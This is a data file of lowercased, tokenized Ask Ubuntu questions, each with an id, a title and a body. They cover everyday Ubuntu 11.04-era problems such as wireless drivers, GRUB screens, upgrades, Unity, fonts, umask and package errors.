44326	what web browsers are there for ubuntu ?	i was wondering what web browsers exist for ubuntu ; i do n't want to use wine . i just want the ones written for ubuntu . i 've never liked the ubuntu software center because it never has all of the programs that i might want to install and therefore it 's not perfect . i just want a list of all the browsers for ubuntu and what 's the point of them . example : firefox : open source , and is pre-installed . please give me only one browser per answer or this will be confusing .
44328	why is there a new group for me as a user ?	why is it that when i provide a username during the installation process for ubuntu , that a new group is created with that name too ? is there a reason we 're not just plain administrators ?
44331	is there a flavour of libreoffice that is better looking	i have set up ubuntu at my office and one thing i hear no end is how ugly libreoffice is . is there a flavour of libreoffice that looks better ? ? ? my colleagues are use to office so when they go to libreoffice the first thing they say is that it is ugly : - ( - looks are a barrier for some people !
44332	why does the software center not have a button for removing recently installed packages ?	this is so obvious that there should be a button for removing latest installed software . why is there no button for it ? this would be a great feature .
44339	how does updating running application binaries during an upgrade work ?	i just upgraded my ubuntu lucid to natty , during the upgrade it replaced most of the running applications with a newer version . how does this work ? ( wo n't the applications crash ? ) what will happen to the application if a lib file got upgraded and a running application which is looking for a older lib tries to load it ?
44343	broadcom bcm4321 wireless does n't work on battery	upgraded ubuntu to 11.04 , now wireless card does not work when i unplug the laptop lspci -vvnn | grep 14e4 10:00.0 ethernet controller [ 0200 ] : broadcom corporation netlink bcm5787m gigabit ethernet pci express [ 14e4:1693 ] ( rev 02 ) 30:00.0 network controller [ 0280 ] : broadcom corporation bcm4321 802.11a/b/g/n [ 14e4:4328 ] ( rev 03 )
44345	pink screen on grub boot	when i boot ubuntu 11.04 , grub shows me a nice , blank pink screen , until most of the os is loaded , after which i can see some output text . i ca n't fix it unless i switch to console mode instead of graphics mode , but i do n't want to do that because then i ca n't change the screen resolution . this used to work correctly in version 10.04 and 10.10 . ( i 've even tried the debug -- verbose boot option , but it only displays things on shutdown , not boot . removing quiet or splash options does n't help . ) any ideas on how to fix that ?
44349	ca n't see shutter indicator icon	i 'm using ubuntu 11.04 . i 've installed shutter but when i use it , i ca n't see its icon in the indicator panel . i 've already tried this but did n't seem to work . what can i do ? thanks in advance .
44352	problems upgrading from 9.04	when i try to do a distribution upgrade , my mouse and keyboard completely stop responding , if i plug them back in , they continue to not respond .
44353	is there a way to open a text file in an already open instance of gedit ?	i have a simple usability problem that i would love to fix . i work quite a bit with gedit as my latex editor ( with the excellent latex plugin ) . i constantly need to work with several files . so , a very common situation for me is to be working on some file ( hence gedit is running ) when the need to edit another file arises . as nautilus is easier to navigate than the `` open dialog '' of gedit , i usually open up a new nautilus window , look for my file , and then double click on it ( followed by a `` doh ! '' ) . what happens is that a new instance of gedit is started with a single tab of the file i just double clicked on , whereas the expected behavior ( from my perspective at least ) is that this new file should be opened in a new tab in the already running gedit instance . so , to my question - is there a way to make it work the way that i prefer ?
44355	broadcom issue in 11.04 , but not in 10.10	i have an ideapad u330 with a broadcom wlan card . originally i was on maverick . and my card worked fine . i had to manually enable wireless every time i booted up but that was n't a big hassle for me . then i switched to natty . it recognized my broadcoam , suggested the driver in additional hardware , and installed it . however , nothing worked in natty . i would click `` enable wireless '' and nothing would work . or it would give me a message saying that wireless was disabled due to the hardware switch being off -- -when it was n't . so then i completely erased everything , went back to maverick , and my wireless is working now . i 'm curious though . would upgrading directly from maverick using synaptic work ? is this a big issue for broadcom drivers going into natty ? any information or insight would be much appreciated . you guys and gals are always the best help on here .
44361	how do i create a custom slideshow as a background ?	when you ask to change the background of the desktop has a folder called contents that shows a sequence of slides . how do i create more sequences of slides with my own wallpaper ?
44364	how do i play mov files in chrome ?	i am trying to play the videos on this site : http : //ipa.group.shef.ac.uk/symbols.php but the screen is just black . when i try to open them in movie player it buffers from 0 % -100 % seven or eight times and then just sits there . i am able to play other mov files just fine and these videos work on my mac . do these work for anyone else ? does anyone have suggestions to fix the issue ? -= edit =- i tried playing the file in vlc with logging enabled and this is what i got : $ vlc -- file-logging vlc media player 1.1.9 the luggage ( revision exported ) blocked : call to unsetenv ( `` dbus_activation_address '' ) blocked : call to unsetenv ( `` dbus_activation_bus_type '' ) [ 0x11d2c60 ] logger interface : using logger . [ 0x10ca120 ] main libvlc : running vlc with the default interface . use 'cvlc ' to use vlc without interface . blocked : call to setlocale ( 6 , `` '' ) warning : call to srand ( 1305704348 ) warning : call to rand ( ) blocked : call to setlocale ( 6 , `` '' ) ( process:7467 ) : gtk-warning ** : locale not supported by c library . using the fallback 'c ' locale . warning : call to rand ( ) warning : call to rand ( ) warning : call to rand ( ) warning : call to rand ( ) [ 0x180b410 ] live555 demux error : nothing to play for rtsp : //xavier.shef.ac.uk:80/ipa/42d.mov [ 0x18024c0 ] main input error : open of `rtsp : //xavier.shef.ac.uk:80/ipa/42d.mov ' failed : ( null )
44369	libreoffice interface is not showing	i just recently installed libreoffice on ubuntu 11.04 through terminal the drop down options did n't show at all . please help me to fix thiscant see the drop down options
44373	how to fix postgresql installation	i upgraded from maverick to natty recently and everything went fine except during the dist-upgrade something went wrong with postgresql . i 've since tried reinstalling , removing , and even purging it via 'sudo apt-get purge postgresql ' but it still comes up with the same error no matter what i do . see below . it was working fine before the upgrade . any help would be greatly appreciated . thanks ! setting up postgresql-common ( 114 ) ... * starting postgresql 8.4 database server * the postgresql server failed to start . please check the log output : 2011-05-19 11:49:41 edt log : could not bind ipv4 socket : address already in use 2011-05-19 11:49:41 edt hint : is another postmaster already running on port 5432 ? if not , wait a few seconds and retry . 2011-05-19 11:49:41 edt warning : could not create listen socket for `` 127.0.0.1 '' 2011-05-19 11:49:41 edt fatal : could not create shared memory segment : invalid argument 2011-05-19 11:49:41 edt detail : failed system call was shmget ( key=5432001 , size=37879808 , 03600 ) . 2011-05-19 11:49:41 edt hint : this error usually means that postgresql 's request for a shared memory segment exceeded your kernel 's shmmax parameter . you can either reduce the request size or reconfigure the kernel with larger shmmax . to reduce the request size ( currently 37879808 bytes ) , reduce postgresql 's shared_buffers parameter ( currently 4096 ) and/or its max_connections parameter ( currently 103 ) . if the request size is already small , it 's possible that it is less than your kernel 's shmmin parameter , in which case raising the request size or reconfiguring shmmin is called for . the postgresql documentation contains more information about shared memory configuration . [ fail ] invoke-rc.d : initscript postgresql , action `` start '' failed . dpkg : error processing postgresql-common ( -- configure ) : subprocess installed post-installation script returned error exit status 1
44374	blank screen with blinking cursor after install	i find that sometimes when i install ubuntu 11 , i get a blank screen with a blinking cursor ... what 's wrong ? following this answer press shift during boot e to edit entry ( quiet splash to text ) f10 to boot got black screen without cursor then tried from another answer replace quiet splash to xforcevesa ( what does this do ? ) got same blank screen without cursor then i tried boot into recovery , then update grub entries . that works , but when i restart , i 'm back to square one .
44378	unity disabled itself , stuck on metacity , can not renable via ccsm , unity -- reset , unity -- replace , etc	i 've been using ubuntu 11.04 for several months now ... but today it just decided to quit on me . i temporarily switched my computer from a widescreen monitor to an older , square one ... and i got the message that my computer was not capable of using unity . this is ridiculous , as i had not only been using unity for months previously . but , at any rate , it 'fell back ' onto the classic desktop ( running metacity ) . nothing i do in ccsm has any effect on the desktop because , duh , it 's running metacity ( for example disabling/re-enabling the unity plugin ) . ctrl+alt+f1 and unity -- reset , unity -- replace leaves me with a metacity desktop , only now without window borders . i 've triple checked- when i log into ubuntu i log into the `` ubuntu '' session , not the `` ubuntu classic '' session or anything like that . it 's just that ... unity did n't like my square monitor and is now irreversibly broken . i 'm actually a fairly experienced ubuntu user , but i do n't know much about unity 's workings , and so i 'm rather stuck . help ?
44379	lxdm showing commas after username	i am using ubuntu 11 with lxde/lxdm in the login screen , i see usernames like lim jiew meng , , , ( jiewmeng ) why is that ?
44380	how do i mount shares from an iomega ix4-200d ?	how do i mount shares from an iomega ix4-200d ? plug-and-play from windows with the included installation cd , but not a word about linux . it looks like there are several ways to do it ; i have put my current solution below .
44381	firefox memory leak	i have had to stop using firefox . i have researched in mozilla and other ubuntu forums . i 'm running current ff , u11.04 , and i have run the gamut disabling add-ons etc . i have gmail and google reader as apptabs or whatever they are called . within a few hours , and often within an hour , my whole system slows to a stop where a hard reboot is the only recovery . cpu leaps to 98 % . when this started to happen i got the pop up indicating that javascript on a page had stopped functioning but asking to stop it had no effect on the huge memory leak . that popup no longer appears there are `` hints '' on the interwebs that this is a gmail problem but nothing definitive . no problem in chrome .
44382	broke evince / missing libevdocument library	after a botched gnome 3 install i managed to revert back to classic and everything seems to be working fine . everything , that is , aside from evince . i was trying to open a pdf file and evince just refused to open ; i clicked on it , it would load , then stop loading and would no longer appear in the system monitor . i then tried opening it from the terminal , and this error came up : evince : error while loading shared libraries : libevdocument.so.3 : can not open shared object file : no such file or directory so i went to synaptic and searched for `` libevdocument '' and found libevdocument3 installed ( version 3.0.0-0ubuntu1~build1 ) which i attempted to mark for reinstallation , but that option was greyed out , so i tried to completely remove but then it warned gnome-core , libevview3 , evince and ubuntu-desktop would be removed . and that sounded bad so i did n't do that . the same happened for uninstall . so now i 'm stuck unable to view pdf files . i 'm about to install adobe reader , but i 'd really rather stick with evince . any suggestions ?
44385	boot partition changes every time it 's mounted . how to stop this ?	i 'm setting up a linux system with full disk encryption . i 've written a script ( to run on every boot ) which will verify that neither the mbr or /boot partition ( ext4 ) has been modified . problem is that every time i boot up the system , my /boot partition hashes differently . trying to solve this , i set the /boot partition to mount as read only in fstab . i then took individual hashes of every file on /boot . after i rebooted none of the files had changed ( and there were no new files ) , yet the filesystem hashed as a whole had changed . i 'm guessing there is something behind the scenes which is changed/updated each time the filesystem is mounted ? if so , can it be disabled ? should i try with ext3 ? any advice would be greatly appreciated ! cheers , lee
44386	reboot cycle with ubuntu server 10.04.02 on install	trying to install ubuntu server 10.04.02 on a dell poweredge 2600 , and i get stuck in a reboot cycle after installation ( which prevents using the server ) . no obvious reasons for it . anyone run into this before ?
44387	upgrade to 11.04 failed , how do i repair when it wo n't even boot ?	i am new to ubuntu but really enjoy it . a couple days ago i was prompted to upgrade to 11.04 , or whichever is the newest version . i think i had 10.10 before . something happened overnight while installing and when i turned my computer on this morning the screen looked crazy . i reset the computer and now i just get the ubuntu splash screen but nothing seems to be happening . i am able to launch from a cd , and it sees my hard drive and all my files , but i do n't want to have to wipe the hard drive and start all over again . i even tried backing up some of my files while booting from my cd , but there is an x mark on some of the files saying i do n't have privileges to access them . i am not sure what to do . any ideas ?
44391	computer does not have the necessary hardware to run unity	possible duplicates : how can i activate unity ? how do i know if my video card can run unity ? just downloaded the latest ubuntu 11.04 i think . when i log in it says my computer doesnt have the right hardware to run unity so it just logs me into the old one . i have a hp elitebook 8440p and am running it alongside windows 7 . please help !
44392	ubuntu one for android and fedora	i wonder where can i get ubuntu-one for fedora , any suggestions ? i want to sync my tablets ( android honeycomb 3 ) with movies/pictures/music in my ubuntu-one account , is it possible ? ( i am not talking about ubuntu-one music ) thanks
44394	apt-get update error : http : //extras.ubuntu.com public key unavailable	gpg error : http : //extras.ubuntu.com natty release : the following signatures could n't be verified because the public key is not available : no_pubkey 16126d3a3e5c1192 i think i selected to install things from extras.ubuntu.com when i used the expert mode installer , but i got the above error when doing apt-get update . how do i fix this ?
44399	fa-66 sound card sometimes cuts out and stops working , causing me to restart jack	i have setup ubuntu 11.04 to use jack and pulseaudio just to get sound working . it was a little tough , but i got it to work . now as i use my computer - like banshee , youtube , or vlc - the fa-66 will just drop out and i am forced to stop/start jack using qjackctl . this is pretty annoying because i have to exit out of most programs after i restart jack ( like firefox ) . eventually i am forced to reboot because the starting/stopping of jack has to happen ever more frequently . how can i fix this ? i am not a linux expert , so if you need me to give you information , just tell me what commands to run and i can past the output here . i 'd really like to get this fixed . jackengine : :xrun : client pulseaudio jack sink finished after current callback jackengine : :xrun : client = pulseaudio jack source was not run : state = 1 jackengine : :xrun : client = pulseaudio jack sink was not run : state = 1 jackaudiodriver : :processgraphasync : process error jackposixmutex : :unlock res = 1 jackposixmutex : :unlock res = 1 jackposixmutex : :unlock res = 1 04:46:33.692 xrun callback ( 1 ) . jackposixmutex : :unlock res = 1 jackengine : :xrun : client = pulseaudio jack source was not run : state = 2 jackengine : :xrun : client pulseaudio jack sink finished after current callback jackaudiodriver : :processgraphasync : process error jackposixmutex : :unlock res = 1 jackposixmutex : :unlock res = 1 jackposixmutex : :unlock res = 1 04:46:34.723 xrun callback ( 6 skipped ) . thank you .
44400	how to preview windows of a specific application in unity ?	i would like in unity , to see a preview of the open windows of a specific application . just like linux dockbarx ( or windows 7 ) . motivation example : when i have several windows open of the same browser , i would like to navigate to the correct one . alt+tab gives all the windows and not just the browser - is too much noise . dockbarx gives the option to hover over the applications in the its launcher and it pops a preview of all open windows of that specific application . how do i do this in unity ? thanks .
44403	how do i open folders containing a blank in a quicklist ?	i am having problems when i want to use a folder name containing a blank ( hentede filer in my case ) . it is in the line : exec= hentede filer of the .desktop file but that does n't work . [ downloads shortcut group ] name=hentede filer exec=nautilus hentede filer targetenvironment=unity
44406	installation automation	use case : when i install ubuntu on another computer , i need to : install all the packages that i use ; make some config changes ; svn checkout some projects ; git clone some projects ; setup .ssh/config ; download a custom eclipse build ; download some additional eclipse plugins ; make many other tweaks . so , i want to run a script , like sudo install-everything-needed , that would execute these predefined actions . is there any package that provides the backbone for such system ?
44418	how to enable root login ?	i would like to enable the root account on my ubuntu installation . i realize the security implications of this .
44423	precondition for executing xorg -configure and postcondition how to use its output ?	action : open a terminal window from ubuntu 11.04 desktop and execute sudo xorg -configure . the command xorg -configure returns an error message because the x server is running . how do i stop the xserver safely and restart it again afterwards ? what is the output of xorg -configure - a text file ? what do i do with the output of xorg -configure to reconfigure my xserver ?
44425	black screen when playing a movie in vlc player , just the sound is enabled	when i move the vlc player window , i can see the video but when i stop moving it , then it gets back to black . this happens not only in vlc but with my webcam too , when i use camorama webcam .
44426	where can i download synaptics touchpad drivers ?	synaptics touchpad is not working on my friend 's laptop . here is the result of xinput list : http : //paste.ubuntu.com/611380/ i think the touchpad is not detected at all , he 's using the laptop with a mouse right now so which is shown as optical mouse in the xinput list result . where can i download synaptics drivers for ubuntu natty ?
44428	is it possible to apply any themes to improve the appearance of evolution ?	is it possible to apply any themes to improve the appearance of evolution ? if so , how ? i think the progress of unity makes evolution look a bit dull , and would like to spark it up .
44431	is it possible to change the color of `` vt.handoff '' screen at boot ?	just curious , is there a configfile to change the purple bootscreen that appears between grub and plymouth ? i know how to change plymouth 's background color , but it does not affect the screen for vt.handoff . thanks !
44438	why is full-hinting for fonts not on by default ?	i 'm running 10.04 which uses libfreetype6 version 2.3 and which is not able to do proper hinting of certain fonts . however , if i understand correctly , later versions are capable of hinting fonts properly . so why does natty still have slight-hinting by default ?
44439	unity side bar sticking ?	so is the unity sidebar sticking a new feature . i run apps and the sidebar stays over the top blocking access to the app you 're trying to run
44441	launcher not auto-hiding while using writer	despite of setting the launcher bar to auto-hide mode , it stops auto-hiding after a while when i 'm using writer . what can an ubuntu rookie like me do to solve this very annoying matter ?
44443	command line audio players	what are popular audio players for the command line ? how to play a single sound file ? are there command line players that also index the music library like banshee , exaile , etc . ?
44448	only displaying background/cursor after login after natty upgrade ( using nvidia drivers )	i just upgraded to 11.04 . now , after i log in all i get is the background and a cursor ( which i can move , no panel , no desktop icons , etc. ) . same thing happens if i select classic mode . i tried installing nvidia 173 drivers ( instead of nvidia-current ) and after that classic mode works again . however i do n't want to be using so old graphics drivers ( and i 'd really like to try out unity ) . my machine is a dell precision m65 laptop which contains a geforce 350m graphics card . i 'm not sure where to start looking for problems , as i 'm only guessing that this is a graphics driver problem ( usually a pretty solid guess ) . any thoughts ?
44449	ubuntu desktop suddenly points to home folder	as of now , my desktop has begun showing the contents of my home folder ( ~ ) instead of the contents of ~/desktop . i must have changed something , but i have no idea what , or what i was doing exactly when it happened . how do i re-point gnome to the right folder ? i 'm running ubuntu 11.04 .
44454	kodak easyshare m590 plugging into ubuntu	i 've got a kodak easyshare m590 that i plug into my ubuntu computer . how do i get it to mount the card to copy the photos over to the computer ? this is a slightly old ubuntu , version 7.10 . cheers
44455	getting wireless n to work on dell vostro 3300 ?	i have a dell vostro 3300 , which has a broadcom bcm4313 wireless . the point is that i can not make it work in n mode . netwotkmanager applet says i 'm on 54 mbit/s . of course , my wireless router is n capable . i 've double checked . anyone knows what to do ? here is the output for lspci -v : 12:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) subsystem : dell device 0010 flags : bus master , fast devsel , latency 0 , irq 17 memory at fbb00000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : wl kernel modules : wl , brcm80211 thanks a lot .
44456	list of compatible or non-compatible video cards for unity 3d	i need to upgrade my video card to make my system compatible with unity 3d , is there a list of compatible or non-compatible video cards for `` natty '' and/or `` unity3d ? '' is there a brand or make i should `` steer clear of ? ''
44458	does ubuntu live session write anything on the primary partition	here is the situation.i am a duel windows ans ubuntu user . accidentally i formatted the c partition ( root partition of windows ) . now i ran several live ubuntu sessions from cd . and found a way to recover my formatted c partition using testdisk . testdisk is supposed to revert back my partition to its original state , but only if i had n't written anything after the format . my question is , does the live session write anything on the c partition ( boot partition ) ? sometimes i tried to remotely access the pc , while the live session was running . i had to change the host name , root password and other network setting..does this activity may result is some data written on the formatted partition ?
44461	black screen when booting on a mac mini 4,1	i have a macmini4,1 ( most recent variant ) with a mini displayport connected to a dvi monitor , and hdmi connected directly to a projector . both monitors are on but black when booting of the ‘natty narwhal’ live cd . i hold the option key to get into the efi boot selector and choose the cd’s efi boot . grub loads , and i choose try ubuntu from the grub menu . from there on the screen is black . how can i get ubuntu to detect my available monitors ? anyone got the same experience ?
44463	if i add some packages to `` recommends : '' , will apps pull them in with the update ?	i have a quesion about debian packaging . i know that if i make a package depend on a larger number of packages then before , the newly introduced dependencies will be automatically downloaded by almost any package manager ( only apt-get upgrade wo n't update the package at all ) . but what happens if i add some packages to `` recommends : '' section ? will it be pulled in automatically ? i 'm particularly interested in behavior of update manager , synaptic , apt-get upgrade , apt-get dselect-upgrade in lucid and later ubuntu versions .
44465	how to install packages in terminal	i have packages that i have downloaded from the internet and for some reason they wo n't install inside of ubuntu software center . my question is what command is there for you to install a package inside of terminal . i have already downloaded the packages and i need and i just need the command that will install the package , not apt-get .
44470	quickest method to display image dimensions for files in nautilus in list view ?	what 's the simplest and quickest way to display the dimensions of a folder containing images ? there does n't appear to be an option to do this in nautilus . there 's only so many right-click file > properties > image operations i can perform , before losing the will to live .
44471	how to show unread imap mail count in byobu	byobu supports `mail notification ' : mail - system mail for the current user ; the letter ' [ m ] ' is displayed in the lower bar toward the left in black text on a grey background how could system mail be set to regard imap accounts ?
44473	building a gnome 3 based distribution from scratch ?	i have this idea of installing ubuntu using the minimal cd , and then installing gnome 3 using the ppa . how viable is this ? and how will my remix compare with distro 's that already ship with gnome 3 like fedora or opensuse ?
44475	how do i specify several folders ( /tmp and /var for instance ) to mount in a same partition using the installer ?	i my next ubuntu installation i want to put /var and /tmp folders together in the same partition , but differente from / . it 's possible to do this from installer menu ? as far as i know you can only select a folder from several options to mount in a certain partition . thanks .
44477	how do i edit a file / launch an app without having to worry about `` permission denied '' messages ?	when i need to edit a file ( e.g . the httpd.conf file or the php.ini file ) i start a terminal and open it with : sudo vim /etc/apache2/httpd.conf most of the times , in order to be able to edit the files that i need without having to sudo all the time , i do a : sudo bash and stop worrying about sudo . however , in some cases , i prefer to edit files with gedit or some other text editors . most of the times though , the user that i 'm logged in as , does not have the necessary permissions to edit the specific file . so my question is the following : besides opening gedit through terminal with sudo , is there any easier way to edit a text file as super user so that i do n't get access denied errors ? the same question applies to running applications as super user ( e.g . wireshark requires super user permissions and i have to launch it from the terminal every time with sudo ) . maybe i 'm missing something obvious here , but please enlighten me .
44479	excel cell comments are white when opened in calc ?	i have an excel 2003 ( .xls ) spreadsheet that i created on my windows box . i tried to open it on open office 's calc program , and it looks like all the cell values / formatting is indeed there . yet , for some reason , all the comments that are in the cells appear to be white text on yellow background -- which makes them impossible to read . any hints how to fix this bug ? ( i am using ubuntu 10.04 lts )
44481	how do i set font properties on a font-by-font basis ?	i have edited my fonts.conf so that different fonts get hinted and smoothed differently . firefox respects this but gtk applications seem to only be governed by gnome-appearance-properties ( apart from auto-hinting ) .
44483	adding code to .gtkrc-2.0 ?	somebody recommended that i add the following code to .gtkrc-2.0 : style `` tooltips '' { fg [ normal ] = { 0.0 , 0.0 , 0.0 } text [ normal ] = { 0.0 , 0.0 , 0.0 } } widget `` gtk-tooltips* '' style `` tooltips '' how do i go about this ? i am using ubuntu 10.04 lts .
44486	where has all the ram gone ?	i have 1gb of ram , and when i run netbeans and firefox , they get about 300mb of ram . at some point , the system becomes very slow , probably 100 times slower than normal , switching windows ( alt+tab ) becomes a huge task and the computer is practically useless . this is probably the moment when it starts to swap . two questions : according to images provided , where has all the ram gone ? when i calculate all the processes memory , it is far smaller then 1gb . is it normal for system to become 100 times slower when the ram is full and using swap space ? on another computer with 4gb of ram i have no problems . update : i added 2gb of ram , now i have 3gb . anyone who wants to use heavy apps with 1gb on unity , i do n't think it 's going to work . works fine on an empty desktop : )
44487	where 's the gnome nanny blacklist repo ?	i have been looking over the internet for the gnome nanny blacklist repo , and i am not able to find it . in the help for the application there 's a repo called nanny central dansguardian clone but the application looks for a nanny central repo that i do n't know where to find . i am really needing this information to setup the application . thank you .
44494	why is xorg taking up so much memory and cpu ?	i recently reinstalled ubuntu 11.04 natty after a massive hard drive failure . now , for some reason , compiz and xorg decide it 's a fun idea to start eating up my ram and cpu - gb by gb . starts out at normal amounts , but quickly balloons to 1-2+gb and starts using most of my cpu . this never happened before , but none of my hardware has really changed . the only difference being that i installed 11.04 cleanly , whereas before i had upgraded from 10.10 . for example : rebooted my computer last night . only program running is transmission . come back this morning - xorg is using 1.5gb ram and over 50 % of my cpu . there is nothing else running or installed . i have n't activated any fancy compiz plugins at all . what gives ? i 'm running 11.04 on a 4x amd athlon ( tm ) ii x4 640 processor with 8gb ram . i 'm using the integrated ati radeon hd3300 gpu with the amd catalyst 11.5 driver - but this problem occurs with the 11.4 and built-in fglrx drivers as well . i can give any other logs or sysinfo if that is needed .
44495	program to remove image from mp3 files	am looking for a program in ubuntu that can remove the logo/image of an mp3 file . for example when i open banshee ( or any other player that can show the image of a mp3 file ) it shows this guy from ecuador , peru or some country that freaks people out . i want to remove his image from all mp3 files i have . just to add , this is not one of those hidden files that comes with the mp3 files folder . this is an embedded image inside the mp3 . just to clarify that part and i want to strip clean the image . would be great a terminal command ( since for me is better ) but a gui one will work as well .
44496	how to run just one application over ethernet while others on wifi	i normally connect my laptop via wifi . however , i would like to use synergy to share my workplace desktop machine with my laptop . but the problem is that my desktop machine does n't have wireless support . so , i have no other options except using ethernet to connect them . my first question is - is it possible to use ethernet for synergy and keep using wifi for all other application . if the answer is yes , can somebody please guide me how to achieve this . thanks ,
44497	how do i set a smoothing to grayscale in fonts.conf ?	in gnome-appearance-properties one can choose between none , grayscale and sub-pixel in the font smoothing category . in fonts.conf one can have e.g. < match target= '' font '' > < edit mode= '' assign '' name= '' rgba '' > < const > unknown < /const > < /edit > < /match > . unknown can have the values : unknown , rgb , bgr , vrgb , vbgr , none . which corresponds to grayscale ?
44501	how do i remove `` apps available for download '' from 11.04	there may be other similiar questions . but i find this advertising as really unnecessary . it becomes useless and annoying after a while . the whole 11.04 package looks pretty professional , until the apps available for download pops up . there is already a software center . i hope they make a way to remove it . i do n't know where to leave feedback for ubuntu 11.04 . still working out a few problems on amd64 installation . but overall i am happy with 11.04 and unity .
44504	piping command output to an empathy chat window	this is n't ubuntu-specific , but since empathy is the default im client on ubuntu , i thought this would be a good place to ask . i have a script that pulls current weather info from google 's weather api , and i 'd like to pipe the output to an empathy window . i imagine i 'd have to do some telepathy scripting . any hints or tips ? thanks in advance . edit : i 'd like to avoid scripting telepathy if at all possible .
44509	upgrading to 10.10	hey guys , ive had some problems with my linux system , slowly been figuring things out . but im quite stumped on this problem , ill copy a section of code for you ... errors were encountered while processing : rubygems1.8 rubygems e : sub-process /usr/bin/dpkg returned an error code ( 1 ) everything else seemed to install fine , except for this piece of code which came before the one i just posted.. setting up libruby1.8 ( 1.8.7.299-2 ) ... setting up ruby1.8 ( 1.8.7.299-2 ) ... setting up ri1.8 ( 1.8.7.299-2 ) ... setting up rubygems1.8 ( 1.3.7-2 ) ... update-alternatives : error : alternative gem ca n't be master : it is a slave of ruby dpkg : error processing rubygems1.8 ( -- configure ) : subprocess installed post-installation script returned error exit status 2 setting up libc-dev-bin ( 2.12.1-0ubuntu10.2 ) ... setting up linux-libc-dev ( 2.6.35-1028.50 ) ... setting up libc6-dev ( 2.12.1-0ubuntu10.2 ) ... setting up ruby1.8-dev ( 1.8.7.299-2 ) ... dpkg : dependency problems prevent configuration of rubygems : rubygems depends on rubygems1.8 ( = 1.3.7-2 ) ; however : package rubygems1.8 is not configured yet . dpkg : error processing rubygems ( -- configure ) : dependency problems - leaving unconfigured setting up libdebconf-kde0 ( 0.1~svn1167939-0ubuntu3 ) ... no apport report written because the error message indicates its a followup error from a previous failure . any ideas anyone ?
44512	how do i get the users to be listed in gnome 3 gdm ?	i installed ubuntu-minimal and tried to install gnome 3 to see how it was . it seems to have installed ok and i 've got to the gdm screen . however , there are no users listed , it just says `` other '' , and when i click that to try and login using my username and password it just greys out like it 's trying to login but does n't do anything ( no hdd activity ) . yet when i try a username that does n't exist it says `` authentication failed ''
44514	accessing home directory of encryted ubuntu . its on a usb stick and refuses to boot	i have a ubuntu system that refuses to boot . i cant seem to fix it . the system is on a usb stick and i need to access the home directory on it , but it is encrypted .
44515	can i install ubuntu from a blu-ray disc ?	i only have blank blu-ray discs around , if i burn the iso to one of them would i be able to boot from it and install ubuntu ? i would rather not burn the disc without being sure , they cost quite a lot around here .
44520	default groups for user in ubuntu 11.04 ?	i accidentally removed my user from some groups yesterday because of some virtualbox issues and today i could n't use sudo to do anything and had to use a livecd to edit sudoers . anyway i want to edit the user to be in the same groups it would be in the default installation but i do n't which groups to add the user to .
44524	no colord package error while compiling gnome3	i am getting the following error while compiling gnome 3 from source . any idea how to get past the error ? configure : error : package requirements ( colord > = 0.1.8 ) were not met : no package 'colord ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables colord_cflags and colord_libs to avoid the need to call pkg-config . see the pkg-config man page for more details .
44528	how do i stop seahorse from asking for my password multiple times on every login ?	i 've set up my system to log me in automatically but for some reason i need to `` unlock my keyring '' x times , where x is a number much larger than one . i 've read a few similar threads here and elsewhere but i 've yet to find a solution to the problem . how do i stop this from happening ? seahorse screenshot note : the original title described the behaviour as `` molestation '' which i think is apt .
44530	problem with pidgin and launcher in unity 3d	i have another problem . after i start pidgin , if i minimize it , pidgin do n't have the little arrow in the launcher showing me it 's running . it shows like it 's not running . any solution please ?
44534	how to set umask for a specific folder	for some obvious reasons i need to set umask value for one specific folder . how can one do that ? thanks beforehand ! update 1 the reason i need to use umask for a specific folder is following . i have a web application and when it creates some file the default permission is 700 . but i need at least 755 permission for that file . i think i could explain the problem more clearly now .
44542	what is `` umask '' and how does it work ?	i believe that umask is something that controls file permissions , but do not fully understand it . after running umask 0644 in a terminal , i can not read the files i create with the command-line text editor nano . i noticed that the permissions of that file are set to 0022 instead of the default 0755 . how does umask work ? i thought i could just remove the each digit in the umask from 0777 , 7 - 6 = 1 and 7 - 4 = 3 , so i expect the permissions to be 0133 , but apparently , this is not the case . what is umask exactly ? explain it to me like i was a `` linux noob '' how do i calculate with umask ? what are use cases for umask ?
44543	sharing guest account disabled	in nautilus when trying to share a folder that is owned by me , i can not share it without a password ( guest access ) as seen on the image . i already installed the samba service that was needed . what could it be ?
44544	sharing home folder between windows 7 and ubuntu 11.04 running inside vmware	i 'm looking for a way to share my user profile between windows 7 and ubuntu as guest os inside vmware . are there any caveats for such an odd marriage , particularly in using ntfs with ubuntu , on directories that will be written by by both oses ( firefox profile , etc. ) ? [ edit ] i know about vmware 's `` shared folders '' feature , what i 'm asking if there are any caveats associated with doing something like this , ie . having ubuntu use ntfs as the home dir , and having it potentially modify things windows might not be happy about .
44545	grub 2 resolution : possible resolutions not listed in vbeinfo or hwinfo -- framebuffer	i tried to set the same resolution i use for the desktop for grub2 ( 1920x1080x32 ) . why is this resolution neither listet in the output of hwinfo -- framebuffer nor in that of vbeinfo on grub 2 console ( available through c from grub menu ) ? why does vbeinfo show different resolutions than hwinfo -- framebuffer even though both methods are recommended to find the available resolutions for grub 2 ? why does vbeinfo say preferred resolution : 1920x1080 even if this resolution is not contained in the output of vbeinfo ?
44550	problem installing on computer with sata-harddrive	today i wanted to install ubuntu 11.04 on my fathers computer , as a dual boot next to windows xp . it has two sata hdds in it . the motherboard is an asus a8n-sli se . the computer has two drives : sata 1 ( in bios ) - 1tb , windows xp installation . sata 2 ( in bios ) - 150gb , empty , the plan is to install ubuntu on this drive . when starting the pc with the regular ubuntu install cd , at the manual partitioning menu only the 1tb harddisk is shown . however , when running `` sudo fdisk -l '' , or checking in gparted , the 150gb drive is shown like it should . after this i tried uncoupling the 1tb disk . this does n't help : now in the partitioning menu it does n't show any hard disks at all . i thought it maybe was some problem with the regular ubuntu installer , so i downloaded and burned the ubuntu 11.04 alternate installer . this however gives exactly the same problem : it does n't show any hard disks ( with only the 150gb disk plugged in ) . it gives one notice before the partitioning menu however : it says the installer found harddrive ( s ) with raid-configuration and it asks if i want to enable those . it does n't matter whether i choose `` yes '' or `` no '' - in both cases , no hard disk shows up in the partitioning menu . in the bios , any raid-configuration is disabled , btw . i hope someone can help me with this problem , because i ca n't think of any next steps . thanks in advance !
44551	which nds emulator run better in ubuntu ?	i just want to know , which nds emulator run better ( performance ) in ubuntu 11.04 ? it does n't matter if it run on wine or natively .
